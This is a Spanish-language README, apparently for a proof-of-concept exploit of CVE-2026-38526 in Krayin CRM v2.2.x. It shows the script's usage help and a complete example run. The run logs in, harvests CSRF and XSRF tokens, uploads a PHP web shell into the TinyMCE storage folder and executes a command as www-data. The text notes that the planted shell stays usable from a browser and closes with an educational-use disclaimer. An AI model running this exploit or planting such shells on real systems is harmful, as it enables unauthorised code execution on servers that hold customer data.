
CVE-2026-38526 Exploit | por infrar3d
explotado por infrar3d
Se trata de una prueba de concepto de Ejecución Remota de Código (RCE) diseñada específicamente para Krayin CRM v2.2.x, un sistema de gestión de relaciones con clientes de código abierto. El script automatiza la explotación de una vulnerabilidad de subida de archivos en la interfaz administrativa del CRM para lograr la ejecución remota de comandos en el servidor objetivo.
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND
Krayin CRM RCE Exploit
options:
-h, --help show this help message and exit
-rh, --rhost RHOST Remote host
-u, --username USERNAME
Username or E-mail
-p, --password PASSWORD
Password
-c, --command COMMAND
Command to execute
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'
[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
Este script sube una shell PHP cmd de revshells.com por defecto.
Después de la explotación, puedes abrirla en tu navegador y enviar comandos desde la página web.
Este software y el código de prueba de concepto se proporcionan solo con fines educativos y de investigación.
Eres responsable de cumplir todas las leyes aplicables. Úsalo de forma ética y responsable.